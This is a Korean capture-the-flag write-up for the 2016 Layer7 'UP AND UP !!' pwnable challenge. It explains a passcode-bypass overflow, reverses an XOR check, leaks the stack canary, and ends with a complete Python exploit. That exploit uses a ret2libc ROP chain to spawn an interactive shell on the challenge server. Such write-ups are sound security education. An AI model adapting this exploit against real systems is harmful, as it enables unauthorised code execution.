[2016 layer7 CTF] UP AND UP !! write-up

 

 

카테고리

PWNABLE

문제

main()

passcode.txt를 읽은 값과 사용자의 입력 값이 같아야 sub_8048756 함수를 호출 할 수 있다.

passcode.txt를 읽은 값은 s2, 사용자의 입력 값은 s1에 들어가는데 0x28 바이트 크기의 s1에 0x50 바이트의 입력을 넣을 수 있어 s2로 overflow가 발생한다.

Overflow를 이용하여 s2의 값을 조작할 수 있으므로 passcode.txt를 몰라도 우회가 가능하다.

 

sub_8048756()

sub_8048756 함수로 들어오면 네 가지 메뉴가 있다.

echo는 입력한 문자열을 출력해주고, man은 메뉴를 출력해주고, exit는 프로그램을 종료한다.

여기서 중요한 건 root_auth 메뉴이다.

s = &v4

root_auth

read

root_auth 함수의 반환 값이 0이 아니라면 s+=100 을 통해 스택의 주소를 증가시킨다.

s는 원래 v4의 주소(bp-0x8c)를 가리키고 있었는데 이 주소가 증가하게 되면 bp-0x28을 가리키게 되고, 버퍼의 크기가 줄어들었기 때문에 read함수에서 overflow가 발생한다.

 

root_auth_8048A28()

sub_8048ABD()

함수 내부로 들어오면, passcode를 입력하고 입력한 passcode를 sub_8048ABD 함수로 넘겨준다.

sub_8048ABD 함수에서는 passcode에 XOR 연산을 거쳐 어떤 문자열과 일치하는지 확인한다.

과정을 살펴보면, passcode를 앞 부분(dest)과 뒷 부분(src)으로 분리한 후 각 부분의 j번째 자리의 수와 상수를 XOR하여 새로운 뒷 부분을 만들고, 뒷 부분의 글자는 앞 부분으로 옮긴다.

이 과정을 4번 반복한다. ( i<=3 )

XOR 과정

이전의 src가 다음의 dest가 되므로 결과 값 중 앞부분(dest)이 XOR 를 거치기 이전의 src인 것을 알 수 있다.

v6은 0x10101010이라는 초기값에서 v6 ^= 2 * v6 을 거치므로 어떤 값이 오는지 알 수 있다.

v2 = 2*v6 ^ src[j] ^ dest[j] 중 v2, v6, src를 알고 있으므로 dest를 구할 수 있다.

이 과정을 4번 반복하면 입력해야 할 passcode를 구할 수 있다.

 

stack canary

스택의 위치를 올려 overflow를 발생시킨다 해도 한 가지 문제가 남아있다.

바로 stack canary이다.

stack canary는 echo 메뉴를 이용하여 Leak 시켜서 간단하게 우회할 수 있다.

문제에서 라이브러리가 주어져 있기 때문에 그 다음은 ROP를 이용하여 공격한다.

 

EXPLOIT

* XOR 구하기

dest = "\xa6\x35\xae\x1f\xf1\x33\x9f\x71\xb4\x61\xe1\x61\xbd" src = "\x76\xb4\xfd\x0c\x32\xbc\xdb\x74\x6f\xc9\xf1\x76\x42" v6 = 0x10101010 arr = [0 for i in range(4*len(src))] for i in range(4): for j in range(len(src)): if i==0 and j==0: v6 = v6 else: v6 ^= 2*v6 arr[(3-i)*len(src)+j] = v6 print (3-i)*len(src)+j idx = 0 data = dest + src for i in range(4): dest2 = data[:len(data)/2] src2 = data[len(data)/2:] v2 = '' for j in range(len(data)/2): v2 += chr(((arr[idx]*2) ^ ord(src2[j])^ord(dest2[j]))&0xff) idx = idx+1 dest = v2 src = dest2 data = dest + src print repr(data)

* 공격 코드

from socket import * from struct import * import sys p = lambda x : pack("<L", x) up = lambda x : unpack("<L", x) ## nc prob.layer7.kr 10009 host = ‘prob.layer7.kr’ port = 10009 def until(s, string): data = '' while string not in data: data += s.recv(1) return data sock = socket(AF_INET, SOCK_STREAM, 0) sock.connect((host, port)) print sock.recv(1024) sock.send("a\x00"*0x28) print until(sock, "\n\n") print until(sock, "\n\n") sock.send("root_auth") print until(sock, ": ") payload = "passcode{H0w_fun_1s_1t!!!}" sock.send(payload+'\n') print sock.recv(1024) payload = "a"*(0x8c-0x64-0xC-5) sock.send("echo "+payload) print until(sock, "a"*(0x8c-0x64-0xC-5)) canary = up(sock.recv(4))[0] print hex(canary) write = 0x08048480 write_got = 0x0804B028 pppr = 0x08048D39 vuln = 0x8048756 write_system = 634064 payload = "a"*(0x8c-0x64-0xC) payload += p(canary) payload += "b"*12 payload += p(write) payload += p(vuln) payload += p(1) payload += p(write_got) payload += p(4) sock.send(payload+'\n') sock.send("exit\n") print until(sock, "Bye !!\n") write_addr = up(sock.recv(4))[0] print hex(write_addr) system = write_addr - write_system print until(sock, "\n\n") print until(sock, "\n\n") sock.send("root_auth\n") print until(sock, ": ") payload = "passcode{H0w_fun_1s_1t!!!}" sock.send(payload+'\n') print sock.recv(1024) system = write_addr - (0xDAFE0-0x40310) binsh = system + (0x16084C-0x40310) payload = "a"*(0x8c-0x64-0xC) payload += p(canary) payload += "b"*12 payload += p(system) payload += "aaaa" payload += p(binsh) sock.send(payload+'\n') sock.send("exit\n") print until(sock, "Bye !!\n") while True: cmd = raw_input('> ') sock.send(cmd+'\n') print sock.recv(1024)